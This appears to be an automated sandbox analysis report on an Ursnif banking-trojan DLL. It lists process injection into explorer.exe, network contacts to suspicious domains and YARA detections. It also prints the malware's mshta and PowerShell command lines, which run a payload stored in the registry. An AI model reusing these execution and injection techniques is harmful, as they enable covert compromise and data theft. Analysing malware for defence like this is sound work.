                      System process connects to network (likely due to code injection or exploit)Show sources
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 52.97.178.98 187
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 193.29.104.83 187
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 40.101.9.178 187
                      Source: C:\Windows\SysWOW64\rundll32.exeDomain query: outlook.office365.com
                      Source: C:\Windows\SysWOW64\rundll32.exeDomain query: outlook.com
                      Source: C:\Windows\SysWOW64\rundll32.exeDomain query: www.outlook.com
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 40.97.160.2 187
                      Source: C:\Windows\SysWOW64\rundll32.exeDomain query: xereunrtol.website
                      Source: C:\Windows\SysWOW64\rundll32.exeDomain query: zereunrtol.website
                      Maps a DLL or memory area into another processShow sources
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
                      Source: C:\Windows\explorer.exeSection loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write
                      Source: C:\Windows\explorer.exeSection loaded: unknown target: unknown protection: execute and read and write
                      Source: C:\Windows\explorer.exeSection loaded: unknown target: unknown protection: execute and read and write
                      Writes to foreign memory regionsShow sources
                      Source: C:\Windows\System32\loaddll32.exeMemory written: C:\Windows\System32\control.exe base: 7FF6DD8E12E0
                      Source: C:\Windows\System32\loaddll32.exeMemory written: C:\Windows\System32\control.exe base: 7FF6DD8E12E0
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\control.exe base: 7FF6DD8E12E0
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\control.exe base: 7FF6DD8E12E0
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\explorer.exe base: 93C000
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\explorer.exe base: 7FFC8DCB1580
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\explorer.exe base: AD0000
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\explorer.exe base: 7FFC8DCB1580
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\explorer.exe base: 940000
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\explorer.exe base: 7FFC8DCB1580
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\explorer.exe base: D80000
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\explorer.exe base: 7FFC8DCB1580
                      Source: C:\Windows\explorer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 2A20574000
                      Source: C:\Windows\explorer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580
                      Source: C:\Windows\explorer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1B91F360000
                      Source: C:\Windows\explorer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580
                      Changes memory attributes in foreign processes to executable or writableShow sources
                      Source: C:\Windows\explorer.exeMemory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580 protect: page execute and read and write
                      Source: C:\Windows\explorer.exeMemory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580 protect: page execute read
                      Source: C:\Windows\explorer.exeMemory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580 protect: page execute and read and write
                      Source: C:\Windows\explorer.exeMemory protected: unknown base: 7FFC8DCB1580 protect: page execute and read and write
                      Source: C:\Windows\explorer.exeMemory protected: unknown base: 7FFC8DCB1580 protect: page execute read
                      Source: C:\Windows\explorer.exeMemory protected: unknown base: 7FFC8DCB1580 protect: page execute and read and write
                      Source: C:\Windows\explorer.exeMemory protected: unknown base: 7FFC8DCB1580 protect: page execute and read and write
                      Source: C:\Windows\explorer.exeMemory protected: unknown base: 7FFC8DCB1580 protect: page execute read
                      Source: C:\Windows\explorer.exeMemory protected: unknown base: 7FFC8DCB1580 protect: page execute and read and write
                      Allocates memory in foreign processesShow sources
                      Source: C:\Windows\explorer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1B91F360000 protect: page execute and read and write
                      Injects code into the Windows Explorer (explorer.exe)Show sources
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: PID: 3352 base: 93C000 value: 00
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: PID: 3352 base: 7FFC8DCB1580 value: EB
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: PID: 3352 base: AD0000 value: 80
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: PID: 3352 base: 7FFC8DCB1580 value: 40
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: PID: 3352 base: 940000 value: 00
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: PID: 3352 base: 7FFC8DCB1580 value: EB
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: PID: 3352 base: D80000 value: 80
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: PID: 3352 base: 7FFC8DCB1580 value: 40
                      Modifies the context of a thread in another process (thread injection)Show sources
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread register set: target process: 3352
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread register set: target process: 3352
                      Source: C:\Windows\explorer.exeThread register set: target process: 4084
                      Source: C:\Windows\explorer.exeThread register set: target process: 4176
                      Source: C:\Windows\explorer.exeThread register set: target process: 4440
                      Creates a thread in another existing process (thread injection)Show sources
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread created: C:\Windows\explorer.exe EIP: 8DCB1580
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread created: C:\Windows\explorer.exe EIP: 8DCB1580
                      Source: C:\Windows\explorer.exeThread created: C:\Windows\System32\RuntimeBroker.exe EIP: 8DCB1580
                      Source: C:\Windows\explorer.exeThread created: unknown EIP: 8DCB1580
                      Source: C:\Windows\explorer.exeThread created: unknown EIP: 8DCB1580
                      Source: C:\Windows\explorer.exeThread created: unknown EIP: 8DCB1580
                      Source: unknownProcess created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Mcbw='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Mcbw).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>'
                      Source: unknownProcess created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Edc0='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Edc0).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>'
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\uT9rwkGATJ.dll',#1
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram))
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\uio4qdnj.cmdline'
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\hjljqxud.cmdline'
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram))
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\hiiw3gsl.cmdline'
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\ebytp2em.cmdline'
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES9EC1.tmp' 'c:\Users\user\AppData\Local\Temp\CSC494F2C58C9734FA38D9A23FE2A87D91.TMP'
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESB12F.tmp' 'c:\Users\user\AppData\Local\Temp\CSCB0814D4E7B5456EB73AE824564C98E9.TMP'
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESB287.tmp' 'c:\Users\user\AppData\Local\Temp\CSCFBA5379BA96A41E2BDA53EBC60FE73A9.TMP'
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESC95B.tmp' 'c:\Users\user\AppData\Local\Temp\CSCB67CC2333FCC4BD79D679F53D429B77D.TMP'
                      Source: C:\Windows\System32\control.exeProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
                      Source: C:\Windows\System32\control.exeProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost -n 5
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost -n 5
                      Source: loaddll32.exe, 00000000.00000002.822246268.0000000001C80000.00000002.00020000.sdmp, explorer.exe, 00000027.00000000.719201700.00000000011E0000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000031.00000000.782765684.000001B91D590000.00000002.00020000.sdmpBinary or memory string: Program Manager
                      Source: explorer.exe, 00000027.00000000.717923899.0000000000B68000.00000004.00000020.sdmpBinary or memory string: Progman\Pr
                      Source: loaddll32.exe, 00000000.00000002.822246268.0000000001C80000.00000002.00020000.sdmp, explorer.exe, 00000027.00000000.719201700.00000000011E0000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000031.00000000.782765684.000001B91D590000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: loaddll32.exe, 00000000.00000002.822246268.0000000001C80000.00000002.00020000.sdmp, explorer.exe, 00000027.00000000.719201700.00000000011E0000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000031.00000000.782765684.000001B91D590000.00000002.00020000.sdmpBinary or memory string: Progman
                      Source: loaddll32.exe, 00000000.00000002.822246268.0000000001C80000.00000002.00020000.sdmp, explorer.exe, 00000027.00000000.719201700.00000000011E0000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000031.00000000.782765684.000001B91D590000.00000002.00020000.sdmpBinary or memory string: Progmanlock
                      Source: explorer.exe, 00000027.00000000.719678172.0000000008778000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWndh
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00B0A82B cpuid
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00B53E33 CreateNamedPipeA,GetLastError,CloseHandle,GetLastError,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E1A1172 GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E1A1825 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00B0A82B RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,

                      Stealing of Sensitive Information:

                      barindex
                      Yara detected UrsnifShow sources
                      Source: Yara matchFile source: 00000000.00000003.534061111.00000000018D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.678884329.0000000004348000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.534116872.00000000018D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.533922988.00000000018D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.534170711.00000000018D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.545735398.0000000005648000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.545790657.0000000005648000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.678615660.0000000004348000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.534139791.00000000018D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.678663993.0000000004348000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.679072196.0000000004348000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.678803157.0000000004348000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000027.00000000.762429648.00000000102CC000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.534181195.00000000018D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.545843952.0000000005648000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.635415693.0000000005648000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.533885657.00000000018D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.678996946.0000000004348000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.620987281.00000000018D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.545818216.0000000005648000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.545905967.0000000005648000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.637594207.000000000544C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 6424, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6388, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 3352, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 4084, type: MEMORYSTR
                      Source: Yara matchFile source: 0.2.loaddll32.exe.b00000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.rundll32.exe.4a794a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.rundll32.exe.96a309.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.13494a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.rundll32.exe.4a794a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.loaddll32.exe.6aa309.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.13494a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.50394a0.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.50394a0.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.3020000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.rundll32.exe.2f7a309.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.rundll32.exe.2f7a309.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.rundll32.exe.96a309.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.69a309.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.69a309.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.loaddll32.exe.6aa309.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.6e1a0000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.300a309.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.2bd0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.300a309.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000004.00000003.475507356.0000000000960000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.821862720.0000000001349000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.488168081.0000000002F70000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.750652443.0000000005039000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.524931430.0000000004A79000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.457623668.0000000003000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.456819132.0000000000690000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.491371934.00000000006A0000.00000040.00000001.sdmp, type: MEMORY

                      Remote Access Functionality:

                      barindex
                      Yara detected UrsnifShow sources
                      Source: Yara matchFile source: 00000000.00000003.534061111.00000000018D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.678884329.0000000004348000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.534116872.00000000018D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.533922988.00000000018D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.534170711.00000000018D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.545735398.0000000005648000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.545790657.0000000005648000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.678615660.0000000004348000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.534139791.00000000018D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.678663993.0000000004348000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.679072196.0000000004348000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.678803157.0000000004348000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000027.00000000.762429648.00000000102CC000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.534181195.00000000018D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.545843952.0000000005648000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.635415693.0000000005648000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.533885657.00000000018D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.678996946.0000000004348000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.620987281.00000000018D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.545818216.0000000005648000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.545905967.0000000005648000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.637594207.000000000544C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 6424, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6388, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 3352, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 4084, type: MEMORYSTR
                      Source: Yara matchFile source: 0.2.loaddll32.exe.b00000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.rundll32.exe.4a794a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.rundll32.exe.96a309.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.13494a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.rundll32.exe.4a794a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.loaddll32.exe.6aa309.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.13494a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.50394a0.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.50394a0.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.3020000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.rundll32.exe.2f7a309.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.rundll32.exe.2f7a309.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.rundll32.exe.96a309.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.69a309.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.69a309.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.loaddll32.exe.6aa309.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.6e1a0000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.300a309.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.2bd0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.300a309.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000004.00000003.475507356.0000000000960000.00000040.00000001.sdmp, type: MEMORY
